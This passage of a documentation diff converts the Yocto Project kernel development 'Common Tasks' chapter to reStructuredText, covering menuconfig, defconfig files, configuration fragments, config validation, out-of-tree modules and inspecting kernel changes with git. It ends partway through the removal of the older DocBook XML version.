+``menuconfig``, see https://en.wikipedia.org/wiki/Menuconfig.
+
+To use the ``menuconfig`` tool in the Yocto Project development
+environment, you must do the following:
+
+- Because you launch ``menuconfig`` using BitBake, you must be sure to
+ set up your environment by running the
+ :ref:`structure-core-script` script found in
+ the :term:`Build Directory`.
+
+- You must be sure of the state of your build's configuration in the
+ :term:`Source Directory`.
+
+- Your build host must have the following two packages installed:
+ ::
+
+ libncurses5-dev
+ libtinfo-dev
+
+The following commands initialize the BitBake environment, run the
+:ref:`ref-tasks-kernel_configme`
+task, and launch ``menuconfig``. These commands assume the Source
+Directory's top-level folder is ``~/poky``:
+::
+
+ $ cd poky
+ $ source oe-init-build-env
+ $ bitbake linux-yocto -c kernel_configme -f
+ $ bitbake linux-yocto -c menuconfig
+
+Once ``menuconfig`` comes up, its standard
+interface allows you to interactively examine and configure all the
+kernel configuration parameters. After making your changes, simply exit
+the tool and save your changes to create an updated version of the
+``.config`` configuration file.
+
+.. note::
+
+ You can use the entire ``.config`` file as the ``defconfig`` file. For
+ information on ``defconfig`` files, see the
+ ":ref:`kernel-dev/kernel-dev-common:changing the configuration`",
+ ":ref:`kernel-dev/kernel-dev-common:using an "in-tree" \`\`defconfig\`\` file`",
+ and ":ref:`kernel-dev/kernel-dev-common:creating a \`\`defconfig\`\` file`"
+ sections.
+
+Consider an example that configures the "CONFIG_SMP" setting for the
+``linux-yocto-4.12`` kernel.
+
+.. note::
+
+ The OpenEmbedded build system recognizes this kernel as ``linux-yocto``
+ through Metadata (e.g. :term:`PREFERRED_VERSION`\ ``_linux-yocto ?= "12.4%"``).
+
+Once ``menuconfig`` launches, use the interface to navigate through the
+selections to find the configuration settings in which you are
+interested. For this example, you deselect "CONFIG_SMP" by clearing the
+"Symmetric Multi-Processing Support" option. Using the interface, you
+can find the option under "Processor Type and Features". To deselect
+"CONFIG_SMP", use the arrow keys to highlight "Symmetric
+Multi-Processing Support" and enter "N" to clear the asterisk. When you
+are finished, exit out and save the change.
+
+Saving the selections updates the ``.config`` configuration file. This
+is the file that the OpenEmbedded build system uses to configure the
+kernel during the build. You can find and examine this file in the Build
+Directory in ``tmp/work/``. The actual ``.config`` is located in the
+area where the specific kernel is built. For example, if you were
+building a Linux Yocto kernel based on the ``linux-yocto-4.12`` kernel
+and you were building a QEMU image targeted for ``x86`` architecture,
+the ``.config`` file would be:
+
+.. code-block:: none
+
+ poky/build/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+gitAUTOINC+eda4d18...
+ ...967-r0/linux-qemux86-standard-build/.config
+
+.. note::
+
+ The previous example directory is artificially split and many of the
+ characters in the actual filename are omitted in order to make it
+ more readable. Also, depending on the kernel you are using, the exact
+ pathname might differ.
+
+Within the ``.config`` file, you can see the kernel settings. For
+example, the following entry shows that symmetric multi-processor
+support is not set:
+::
+
+ # CONFIG_SMP is not set
+
+A good method to isolate changed configurations is to use a combination
+of the ``menuconfig`` tool and simple shell commands. Before changing
+configurations with ``menuconfig``, copy the existing ``.config`` and
+rename it to something else, use ``menuconfig`` to make as many changes
+as you want and save them, then compare the renamed configuration file
+against the newly created file. You can use the resulting differences as
+your base to create configuration fragments to permanently save in your
+kernel layer.
+
+.. note::
+
+ Be sure to make a copy of the ``.config`` file and do not just rename it.
+ The build system needs an existing ``.config`` file from which to work.
+
+Creating a  ``defconfig`` File
+------------------------------
+
+A ``defconfig`` file in the context of the Yocto Project is often a
+``.config`` file that is copied from a build or a ``defconfig`` taken
+from the kernel tree and moved into recipe space. You can use a
+``defconfig`` file to retain a known set of kernel configurations from
+which the OpenEmbedded build system can draw to create the final
+``.config`` file.
+
+.. note::
+
+ Out-of-the-box, the Yocto Project never ships a ``defconfig`` or ``.config``
+ file. The OpenEmbedded build system creates the final ``.config`` file used
+ to configure the kernel.
+
+To create a ``defconfig``, start with a complete, working Linux kernel
+``.config`` file. Copy that file to the appropriate
+``${``\ :term:`PN`\ ``}`` directory in
+your layer's ``recipes-kernel/linux`` directory, and rename the copied
+file to "defconfig" (e.g.
+``~/meta-mylayer/recipes-kernel/linux/linux-yocto/defconfig``). Then,
+add the following lines to the linux-yocto ``.bbappend`` file in your
+layer:
+::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+ SRC_URI += "file://defconfig"
+
+The :term:`SRC_URI` tells the build system how to search for the file, while the
+:term:`FILESEXTRAPATHS` extends the :term:`FILESPATH`
+variable (search directories) to include the ``${PN}`` directory you
+created to hold the configuration changes.
+
+.. note::
+
+ The build system applies the configurations from the ``defconfig``
+ file before applying any subsequent configuration fragments. The
+ final kernel configuration is a combination of the configurations in
+ the ``defconfig`` file and any configuration fragments you provide. You need
+ to realize that if you have any configuration fragments, the build system
+ applies these on top of and after applying the existing ``defconfig`` file
+ configurations.
+
+For more information on configuring the kernel, see the "`Changing the
+Configuration <#changing-the-configuration>`__" section.
+
+.. _creating-config-fragments:
+
+Creating Configuration Fragments
+--------------------------------
+
+Configuration fragments are simply kernel options that appear in a file
+placed where the OpenEmbedded build system can find and apply them. The
+build system applies configuration fragments after applying
+configurations from a ``defconfig`` file. Thus, the final kernel
+configuration is a combination of the configurations in the
+``defconfig`` file and then any configuration fragments you provide. The
+build system applies fragments on top of and after applying the existing
+defconfig file configurations.
+
+Syntactically, the configuration statement is identical to what would
+appear in the ``.config`` file, which is in the :term:`Build Directory`.
+
+.. note::
+
+ For more information about where the ``.config`` file is located, see the
+ example in the
+ ":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``"
+ section.
+
+It is simple to create a configuration fragment. One method is to use
+shell commands. For example, issuing the following from the shell
+creates a configuration fragment file named ``my_smp.cfg`` that enables
+multi-processor support within the kernel:
+::
+
+ $ echo "CONFIG_SMP=y" >> my_smp.cfg
+
+.. note::
+
+ All configuration fragment files must use the ``.cfg`` extension in order
+ for the OpenEmbedded build system to recognize them as a configuration
+ fragment.
+
+Another method is to create a configuration fragment using the
+differences between two configuration files: one previously created and
+saved, and one freshly created using the ``menuconfig`` tool.
+
+To create a configuration fragment using this method, follow these
+steps:
+
+1. *Complete a Build Through Kernel Configuration:* Complete a build at
+ least through the kernel configuration task as follows:
+ ::
+
+ $ bitbake linux-yocto -c kernel_configme -f
+
+ This step ensures that you create a
+ ``.config`` file from a known state. Because situations exist where
+ your build state might become unknown, it is best to run this task
+ prior to starting ``menuconfig``.
+
+2. *Launch menuconfig:* Run the ``menuconfig`` command:
+ ::
+
+ $ bitbake linux-yocto -c menuconfig
+
+3. *Create the Configuration Fragment:* Run the ``diffconfig`` command
+ to prepare a configuration fragment. The resulting file
+ ``fragment.cfg`` is placed in the
+ ``${``\ :term:`WORKDIR`\ ``}``
+ directory:
+ ::
+
+ $ bitbake linux-yocto -c diffconfig
+
+The ``diffconfig`` command creates a file that is a list of Linux kernel
+``CONFIG_`` assignments. See the "`Changing the
+Configuration <#changing-the-configuration>`__" section for additional
+information on how to use the output as a configuration fragment.
+
+.. note::
+
+ You can also use this method to create configuration fragments for a
+ BSP. See the ":ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`"
+ section for more information.
+
+Where do you put your configuration fragment files? You can place these
+files in an area pointed to by
+:term:`SRC_URI` as directed by your
+``bblayers.conf`` file, which is located in your layer. The OpenEmbedded
+build system picks up the configuration and adds it to the kernel's
+configuration. For example, suppose you had a set of configuration
+options in a file called ``myconfig.cfg``. If you put that file inside a
+directory named ``linux-yocto`` that resides in the same directory as
+the kernel's append file within your layer and then add the following
+statements to the kernel's append file, those configuration options will
+be picked up and applied when the kernel is built:
+::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+ SRC_URI += "file://myconfig.cfg"
+
+As mentioned earlier, you can group related configurations into multiple
+files and name them all in the ``SRC_URI`` statement as well. For
+example, you could group separate configurations specifically for
+Ethernet and graphics into their own files and add those by using a
+``SRC_URI`` statement like the following in your append file:
+::
+
+ SRC_URI += "file://myconfig.cfg \
+ file://eth.cfg \
+ file://gfx.cfg"
+
+Validating Configuration
+------------------------
+
+You can use the
+:ref:`ref-tasks-kernel_configcheck`
+task to provide configuration validation:
+::
+
+ $ bitbake linux-yocto -c kernel_configcheck -f
+
+Running this task produces warnings for when a
+requested configuration does not appear in the final ``.config`` file or
+when you override a policy configuration in a hardware configuration
+fragment.
+
+In order to run this task, you must have an existing ``.config`` file.
+See the ":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``" section for
+information on how to create a configuration file.
+
+Following is sample output from the ``do_kernel_configcheck`` task:
+
+.. code-block:: none
+
+ Loading cache: 100% |########################################################| Time: 0:00:00
+ Loaded 1275 entries from dependency cache.
+ NOTE: Resolving any missing task queue dependencies
+
+ Build Configuration:
+ .
+ .
+ .
+
+ NOTE: Executing SetScene Tasks
+ NOTE: Executing RunQueue Tasks
+ WARNING: linux-yocto-4.12.12+gitAUTOINC+eda4d18ce4_16de014967-r0 do_kernel_configcheck:
+ [kernel config]: specified values did not make it into the kernel's final configuration:
+
+ ---------- CONFIG_X86_TSC -----------------
+ Config: CONFIG_X86_TSC
+ From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc-cpu.cfg
+ Requested value: CONFIG_X86_TSC=y
+ Actual value:
+
+
+ ---------- CONFIG_X86_BIGSMP -----------------
+ Config: CONFIG_X86_BIGSMP
+ From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
+ /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
+ Requested value: # CONFIG_X86_BIGSMP is not set
+ Actual value:
+
+
+ ---------- CONFIG_NR_CPUS -----------------
+ Config: CONFIG_NR_CPUS
+ From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
+ /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc.cfg
+ /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
+ Requested value: CONFIG_NR_CPUS=8
+ Actual value: CONFIG_NR_CPUS=1
+
+
+ ---------- CONFIG_SCHED_SMT -----------------
+ Config: CONFIG_SCHED_SMT
+ From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
+ /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
+ Requested value: CONFIG_SCHED_SMT=y
+ Actual value:
+
+
+
+ NOTE: Tasks Summary: Attempted 288 tasks of which 285 didn't need to be rerun and all succeeded.
+
+ Summary: There were 3 WARNING messages shown.
+
+.. note::
+
+ The previous output example has artificial line breaks to make it
+ more readable.
+
+The output describes the various problems that you can encounter along
+with where to find the offending configuration items. You can use the
+information in the logs to adjust your configuration files and then
+repeat the
+:ref:`ref-tasks-kernel_configme`
+and
+:ref:`ref-tasks-kernel_configcheck`
+tasks until they produce no warnings.
+
+For more information on how to use the ``menuconfig`` tool, see the
+:ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\`` section.
+
+Fine-Tuning the Kernel Configuration File
+-----------------------------------------
+
+You can make sure the ``.config`` file is as lean or efficient as
+possible by reading the output of the kernel configuration fragment
+audit, noting any issues, making changes to correct the issues, and then
+repeating.
+
+As part of the kernel build process, the ``do_kernel_configcheck`` task
+runs. This task validates the kernel configuration by checking the final
+``.config`` file against the input files. During the check, the task
+produces warning messages for the following issues:
+
+- Requested options that did not make the final ``.config`` file.
+
+- Configuration items that appear twice in the same configuration
+ fragment.
+
+- Configuration items tagged as "required" that were overridden.
+
+- A board overrides a non-board specific option.
+
+- Listed options not valid for the kernel being processed. In other
+ words, the option does not appear anywhere.
+
+.. note::
+
+ The :ref:`ref-tasks-kernel_configcheck` task can also optionally report if
+ an option is overridden during processing.
+
+For each output warning, a message points to the file that contains a
+list of the options and a pointer to the configuration fragment that
+defines them. Collectively, the files are the key to streamlining the
+configuration.
+
+To streamline the configuration, do the following:
+
+1. *Use a Working Configuration:* Start with a full configuration that
+ you know works. Be sure the configuration builds and boots
+ successfully. Use this configuration file as your baseline.
+
+2. *Run Configure and Check Tasks:* Separately run the
+ ``do_kernel_configme`` and ``do_kernel_configcheck`` tasks:
+ ::
+
+ $ bitbake linux-yocto -c kernel_configme -f
+ $ bitbake linux-yocto -c kernel_configcheck -f
+
+3. *Process the Results:* Take the resulting list of files from the
+ ``do_kernel_configcheck`` task warnings and do the following:
+
+ - Drop values that are redefined in the fragment but do not change
+ the final ``.config`` file.
+
+ - Analyze and potentially drop values from the ``.config`` file that
+ override required configurations.
+
+ - Analyze and potentially remove non-board specific options.
+
+ - Remove repeated and invalid options.
+
+4. *Re-Run Configure and Check Tasks:* After you have worked through the
+ output of the kernel configuration audit, you can re-run the
+ ``do_kernel_configme`` and ``do_kernel_configcheck`` tasks to see the
+ results of your changes. If you have more issues, you can deal with
+ them as described in the previous step.
+
+Iteratively working through steps two through four eventually yields a
+minimal, streamlined configuration file. Once you have the best
+``.config``, you can build the Linux Yocto kernel.
+
+Expanding Variables
+===================
+
+Sometimes it is helpful to determine what a variable expands to during a
+build. You can examine the values of variables by examining the
+output of the ``bitbake -e`` command. The output is long and is more
+easily managed in a text file, which allows for easy searches:
+::
+
+ $ bitbake -e virtual/kernel > some_text_file
+
+Within the text file, you can see
+exactly how each variable is expanded and used by the OpenEmbedded build
+system.
+
+Working with a "Dirty" Kernel Version String
+============================================
+
+If you build a kernel image and the version string has a "+" or a
+"-dirty" at the end, uncommitted modifications exist in the kernel's
+source directory. Follow these steps to clean up the version string:
+
+1. *Discover the Uncommitted Changes:* Go to the kernel's locally cloned
+ Git repository (source directory) and use the following Git command
+ to list the files that have been changed, added, or removed:
+ ::
+
+ $ git status
+
+2. *Commit the Changes:* You should commit those changes to the kernel
+ source tree regardless of whether or not you will save, export, or
+ use the changes:
+ ::
+
+ $ git add
+ $ git commit -s -a -m "getting rid of -dirty"
+
+3. *Rebuild the Kernel Image:* Once you commit the changes, rebuild the
+ kernel.
+
+ Depending on your particular kernel development workflow, the
+ commands you use to rebuild the kernel might differ. For information
+ on building the kernel image when using ``devtool``, see the
+ ":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+ section. For
+ information on building the kernel image when using Bitbake, see the
+ "`Using Traditional Kernel Development to Patch the
+ Kernel <#using-traditional-kernel-development-to-patch-the-kernel>`__"
+ section.
+
+Working With Your Own Sources
+=============================
+
+If you cannot work with one of the Linux kernel versions supported by
+existing linux-yocto recipes, you can still make use of the Yocto
+Project Linux kernel tooling by working with your own sources. When you
+use your own sources, you will not be able to leverage the existing
+kernel :term:`Metadata` and stabilization
+work of the linux-yocto sources. However, you will be able to manage
+your own Metadata in the same format as the linux-yocto sources.
+Maintaining format compatibility facilitates converging with linux-yocto
+on a future, mutually-supported kernel version.
+
+To help you use your own sources, the Yocto Project provides a
+linux-yocto custom recipe (``linux-yocto-custom.bb``) that uses
+``kernel.org`` sources and the Yocto Project Linux kernel tools for
+managing kernel Metadata. You can find this recipe in the ``poky`` Git
+repository of the Yocto Project :yocto_git:`Source Repository <>`
+at:
+::
+
+ poky/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+
+Here are some basic steps you can use to work with your own sources:
+
+1. *Create a Copy of the Kernel Recipe:* Copy the
+ ``linux-yocto-custom.bb`` recipe to your layer and give it a
+ meaningful name. The name should include the version of the Yocto
+ Linux kernel you are using (e.g. ``linux-yocto-myproject_4.12.bb``,
+ where "4.12" is the base version of the Linux kernel with which you
+ would be working).
+
+2. *Create a Directory for Your Patches:* In the same directory inside
+ your layer, create a matching directory to store your patches and
+ configuration files (e.g. ``linux-yocto-myproject``).
+
+3. *Ensure You Have Configurations:* Make sure you have either a
+ ``defconfig`` file or configuration fragment files in your layer.
+ When you use the ``linux-yocto-custom.bb`` recipe, you must specify a
+ configuration. If you do not have a ``defconfig`` file, you can run
+ the following:
+ ::
+
+ $ make defconfig
+
+ After running the command, copy the
+ resulting ``.config`` file to the ``files`` directory in your layer
+ as "defconfig" and then add it to the
+ :term:`SRC_URI` variable in the
+ recipe.
+
+ Running the ``make defconfig`` command results in the default
+ configuration for your architecture as defined by your kernel.
+ However, no guarantee exists that this configuration is valid for
+ your use case, or that your board will even boot. This is
+ particularly true for non-x86 architectures.
+
+ To use non-x86 ``defconfig`` files, you need to be more specific and
+ find one that matches your board (i.e. for arm, you look in
+ ``arch/arm/configs`` and use the one that is the best starting point
+ for your board).
+
+4. *Edit the Recipe:* Edit the following variables in your recipe as
+ appropriate for your project:
+
+ - :term:`SRC_URI`: The
+ ``SRC_URI`` should specify a Git repository that uses one of the
+ supported Git fetcher protocols (i.e. ``file``, ``git``, ``http``,
+ and so forth). The ``SRC_URI`` variable should also specify either
+ a ``defconfig`` file or some configuration fragment files. The
+ skeleton recipe provides an example ``SRC_URI`` as a syntax
+ reference.
+
+ - :term:`LINUX_VERSION`:
+ The Linux kernel version you are using (e.g. "4.12").
+
+ - :term:`LINUX_VERSION_EXTENSION`:
+ The Linux kernel ``CONFIG_LOCALVERSION`` that is compiled into the
+ resulting kernel and visible through the ``uname`` command.
+
+ - :term:`SRCREV`: The commit ID
+ from which you want to build.
+
+ - :term:`PR`: Treat this variable the
+ same as you would in any other recipe. Increment the variable to
+ indicate to the OpenEmbedded build system that the recipe has
+ changed.
+
+ - :term:`PV`: The default ``PV``
+ assignment is typically adequate. It combines the
+ ``LINUX_VERSION`` with the Source Control Manager (SCM) revision
+ as derived from the :term:`SRCPV`
+ variable. The combined results are a string with the following
+ form:
+ ::
+
+ 3.19.11+git1+68a635bf8dfb64b02263c1ac80c948647cc76d5f_1+218bd8d2022b9852c60d32f0d770931e3cf343e2
+
+ While lengthy, the extra verbosity in ``PV`` helps ensure you are
+ using the exact sources from which you intend to build.
+
+ - :term:`COMPATIBLE_MACHINE`:
+ A list of the machines supported by your new recipe. This variable
+ in the example recipe is set by default to a regular expression
+ that matches only the empty string, "(^$)". This default setting
+ triggers an explicit build failure. You must change it to match a
+ list of the machines that your new recipe supports. For example,
+ to support the ``qemux86`` and ``qemux86-64`` machines, use the
+ following form:
+ ::
+
+ COMPATIBLE_MACHINE = "qemux86|qemux86-64"
+
+5. *Customize Your Recipe as Needed:* Provide further customizations to
+ your recipe as needed just as you would customize an existing
+ linux-yocto recipe. See the "`Modifying an Existing
+ Recipe <#modifying-an-existing-recipe>`__" section for information.
+
+Working with Out-of-Tree Modules
+================================
+
+This section describes steps to build out-of-tree modules on your target
+and describes how to incorporate out-of-tree modules in the build.
+
+Building Out-of-Tree Modules on the Target
+------------------------------------------
+
+While the traditional Yocto Project development model would be to
+include kernel modules as part of the normal build process, you might
+find it useful to build modules on the target. This could be the case if
+your target system is capable and powerful enough to handle the
+necessary compilation. Before deciding to build on your target, however,
+you should consider the benefits of using a proper cross-development
+environment from your build host.
+
+If you want to be able to build out-of-tree modules on the target, there
+are some steps you need to take on the target that is running your SDK
+image. Briefly, the ``kernel-dev`` package is installed by default on
+all ``*.sdk`` images and the ``kernel-devsrc`` package is installed on
+many of the ``*.sdk`` images. However, you need to create some scripts
+prior to attempting to build the out-of-tree modules on the target that
+is running that image.
+
+Prior to attempting to build the out-of-tree modules, you need to be on
+the target as root and you need to change to the ``/usr/src/kernel``
+directory. Next, ``make`` the scripts:
+
+.. code-block:: none
+
+ # cd /usr/src/kernel
+ # make scripts
+
+Because all SDK image recipes include ``dev-pkgs``, the
+``kernel-dev`` packages will be installed as part of the SDK image and
+the ``kernel-devsrc`` packages will be installed as part of applicable
+SDK images. The SDK uses the scripts when building out-of-tree modules.
+Once you have switched to that directory and created the scripts, you
+should be able to build your out-of-tree modules on the target.
+
+Incorporating Out-of-Tree Modules
+---------------------------------
+
+While it is always preferable to work with sources integrated into the
+Linux kernel sources, if you need an external kernel module, the
+``hello-mod.bb`` recipe is available as a template from which you can
+create your own out-of-tree Linux kernel module recipe.
+
+This template recipe is located in the ``poky`` Git repository of the
+Yocto Project :yocto_git:`Source Repository <>` at:
+
+.. code-block:: none
+
+ poky/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+
+To get started, copy this recipe to your layer and give it a meaningful
+name (e.g. ``mymodule_1.0.bb``). In the same directory, create a new
+directory named ``files`` where you can store any source files, patches,
+or other files necessary for building the module that do not come with
+the sources. Finally, update the recipe as needed for the module.
+Typically, you will need to set the following variables:
+
+- :term:`DESCRIPTION`
+
+- :term:`LICENSE* <LICENSE>`
+
+- :term:`SRC_URI`
+
+- :term:`PV`
+
+Depending on the build system used by the module sources, you might need
+to make some adjustments. For example, a typical module ``Makefile``
+looks much like the one provided with the ``hello-mod`` template:
+::
+
+ obj-m := hello.o
+
+ SRC := $(shell pwd)
+
+ all:
+ $(MAKE) -C $(KERNEL_SRC) M=$(SRC)
+
+ modules_install:
+ $(MAKE) -C $(KERNEL_SRC) M=$(SRC) modules_install
+ ...
+
+The important point to note here is the :term:`KERNEL_SRC` variable. The
+:ref:`module <ref-classes-module>` class sets this variable and the
+:term:`KERNEL_PATH` variable to
+``${STAGING_KERNEL_DIR}`` with the necessary Linux kernel build
+information to build modules. If your module ``Makefile`` uses a
+different variable, you might want to override the
+:ref:`ref-tasks-compile` step, or
+create a patch to the ``Makefile`` to work with the more typical
+``KERNEL_SRC`` or ``KERNEL_PATH`` variables.
+
+After you have prepared your recipe, you will likely want to include the
+module in your images. To do this, see the documentation for the
+following variables in the Yocto Project Reference Manual and set one of
+them appropriately for your machine configuration file:
+
+- :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+
+- :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+
+- :term:`MACHINE_EXTRA_RDEPENDS`
+
+- :term:`MACHINE_EXTRA_RRECOMMENDS`
+
+Modules are often not required for boot and can be excluded from certain
+build configurations. The following allows for the most flexibility:
+::
+
+ MACHINE_EXTRA_RRECOMMENDS += "kernel-module-mymodule"
+
+The value is
+derived by appending the module filename without the ``.ko`` extension
+to the string "kernel-module-".
+
+Because the variable is
+:term:`RRECOMMENDS` and not a
+:term:`RDEPENDS` variable, the build
+will not fail if this module is not available to include in the image.
+
+Inspecting Changes and Commits
+==============================
+
+A common question when working with a kernel is: "What changes have been
+applied to this tree?" Rather than using "grep" across directories to
+see what has changed, you can use Git to inspect or search the kernel
+tree. Using Git is an efficient way to see what has changed in the tree.
+
+What Changed in a Kernel?
+-------------------------
+
+Following are a few examples that show how to use Git commands to
+examine changes. These examples are by no means the only way to see
+changes.
+
+.. note::
+
+ In the following examples, unless you provide a commit range, ``kernel.org``
+ history is blended with Yocto Project kernel changes. You can form
+ ranges by using branch names from the kernel tree as the upper and
+ lower commit markers with the Git commands. You can see the branch
+ names through the web interface to the Yocto Project source
+ repositories at :yocto_git:`/`.
+
+To see a full range of the changes, use the ``git whatchanged`` command
+and specify a commit range for the branch (`commit`\ ``..``\ `commit`).
+
+Here is an example that looks at what has changed in the ``emenlow``
+branch of the ``linux-yocto-3.19`` kernel. The lower commit range is the
+commit associated with the ``standard/base`` branch, while the upper
+commit range is the commit associated with the ``standard/emenlow``
+branch.
+::
+
+ $ git whatchanged origin/standard/base..origin/standard/emenlow
+
+To see short, one line summaries of changes use the ``git log`` command:
+::
+
+ $ git log --oneline origin/standard/base..origin/standard/emenlow
+
+Use this command to see code differences for the changes:
+::
+
+ $ git diff origin/standard/base..origin/standard/emenlow
+
+Use this command to see the commit log messages and the text
+differences:
+::
+
+ $ git show origin/standard/base..origin/standard/emenlow
+
+Use this command to create individual patches for each change. Here is
+an example that that creates patch files for each commit and places them
+in your ``Documents`` directory:
+::
+
+ $ git format-patch -o $HOME/Documents origin/standard/base..origin/standard/emenlow
+
+Showing a Particular Feature or Branch Change
+---------------------------------------------
+
+Tags in the Yocto Project kernel tree divide changes for significant
+features or branches. The ``git show`` tag command shows changes based
+on a tag. Here is an example that shows ``systemtap`` changes:
+::
+
+ $ git show systemtap
+
+You can use the ``git branch --contains`` tag command to
+show the branches that contain a particular feature. This command shows
+the branches that contain the ``systemtap`` feature:
+::
+
+ $ git branch --contains systemtap
+
+Adding Recipe-Space Kernel Features
+===================================
+
+You can add kernel features in the
+:ref:`recipe-space <kernel-dev/kernel-dev-advanced:recipe-space metadata>`
+by using the :term:`KERNEL_FEATURES`
+variable and by specifying the feature's ``.scc`` file path in the
+:term:`SRC_URI` statement. When you
+add features using this method, the OpenEmbedded build system checks to
+be sure the features are present. If the features are not present, the
+build stops. Kernel features are the last elements processed for
+configuring and patching the kernel. Therefore, adding features in this
+manner is a way to enforce specific features are present and enabled
+without needing to do a full audit of any other layer's additions to the
+``SRC_URI`` statement.
+
+You add a kernel feature by providing the feature as part of the
+``KERNEL_FEATURES`` variable and by providing the path to the feature's
+``.scc`` file, which is relative to the root of the kernel Metadata. The
+OpenEmbedded build system searches all forms of kernel Metadata on the
+``SRC_URI`` statement regardless of whether the Metadata is in the
+"kernel-cache", system kernel Metadata, or a recipe-space Metadata (i.e.
+part of the kernel recipe). See the
+":ref:`kernel-dev/kernel-dev-advanced:kernel metadata location`" section for
+additional information.
+
+When you specify the feature's ``.scc`` file on the ``SRC_URI``
+statement, the OpenEmbedded build system adds the directory of that
+``.scc`` file along with all its subdirectories to the kernel feature
+search path. Because subdirectories are searched, you can reference a
+single ``.scc`` file in the ``SRC_URI`` statement to reference multiple
+kernel features.
+
+Consider the following example that adds the "test.scc" feature to the
+build.
+
+1. *Create the Feature File:* Create a ``.scc`` file and locate it just
+ as you would any other patch file, ``.cfg`` file, or fetcher item you
+ specify in the ``SRC_URI`` statement.
+
+ .. note::
+
+ - You must add the directory of the ``.scc`` file to the
+ fetcher's search path in the same manner as you would add a
+ ``.patch`` file.
+
+ - You can create additional ``.scc`` files beneath the directory
+ that contains the file you are adding. All subdirectories are
+ searched during the build as potential feature directories.
+
+ Continuing with the example, suppose the "test.scc" feature you are
+ adding has a ``test.scc`` file in the following directory:
+ ::
+
+ my_recipe
+ |
+ +-linux-yocto
+ |
+ +-test.cfg
+ +-test.scc
+
+ In this example, the
+ ``linux-yocto`` directory has both the feature ``test.scc`` file and
+ a similarly named configuration fragment file ``test.cfg``.
+
+2. *Add the Feature File to SRC_URI:* Add the ``.scc`` file to the
+ recipe's ``SRC_URI`` statement:
+ ::
+
+ SRC_URI_append = " file://test.scc"
+
+ The leading space before the path is important as the path is
+ appended to the existing path.
+
+3. *Specify the Feature as a Kernel Feature:* Use the
+ ``KERNEL_FEATURES`` statement to specify the feature as a kernel
+ feature:
+ ::
+
+ KERNEL_FEATURES_append = " test.scc"
+
+ The OpenEmbedded build
+ system processes the kernel feature when it builds the kernel.
+
+ .. note::
+
+ If other features are contained below "test.scc", then their
+ directories are relative to the directory containing the ``test.scc``
+ file.
diff --git a/documentation/kernel-dev/kernel-dev-common.xml b/documentation/kernel-dev/kernel-dev-common.xml
deleted file mode 100644
index c1c2d6d703..0000000000
--- a/documentation/kernel-dev/kernel-dev-common.xml
+++ /dev/null
@@ -1,2729 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='kernel-dev-common'>
-<title>Common Tasks</title>
-
- <para>
- This chapter presents several common tasks you perform when you
- work with the Yocto Project Linux kernel.
- These tasks include preparing your host development system for
- kernel development, preparing a layer, modifying an existing recipe,
- patching the kernel, configuring the kernel, iterative development,
- working with your own sources, and incorporating out-of-tree modules.
- <note>
- The examples presented in this chapter work with the Yocto Project
- 2.4 Release and forward.
- </note>
- </para>
-
- <section id='preparing-the-build-host-to-work-on-the-kernel'>
- <title>Preparing the Build Host to Work on the Kernel</title>
-
- <para>
- Before you can do any kernel development, you need to be
- sure your build host is set up to use the Yocto Project.
- For information on how to get set up, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
- section in the Yocto Project Development Tasks Manual.
- Part of preparing the system is creating a local Git
- repository of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (<filename>poky</filename>) on your system.
- Follow the steps in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</ulink>"
- section in the Yocto Project Development Tasks Manual to set up your
- Source Directory.
- <note>
- Be sure you check out the appropriate development branch or
- you create your local branch by checking out a specific tag
- to get the desired version of Yocto Project.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out by Branch in Poky</ulink>"
- and
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checkout-out-by-tag-in-poky'>Checking Out by Tag in Poky</ulink>"
- sections in the Yocto Project Development Tasks Manual for more
- information.
- </note>
- </para>
-
- <para>
- Kernel development is best accomplished using
- <ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'><filename>devtool</filename></ulink>
- and not through traditional kernel workflow methods.
- The remainder of this section provides information for both
- scenarios.
- </para>
-
- <section id='getting-ready-to-develop-using-devtool'>
- <title>Getting Ready to Develop Using <filename>devtool</filename></title>
-
- <para>
- Follow these steps to prepare to update the kernel image using
- <filename>devtool</filename>.
- Completing this procedure leaves you with a clean kernel image
- and ready to make modifications as described in the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- section:
- <orderedlist>
- <listitem><para>
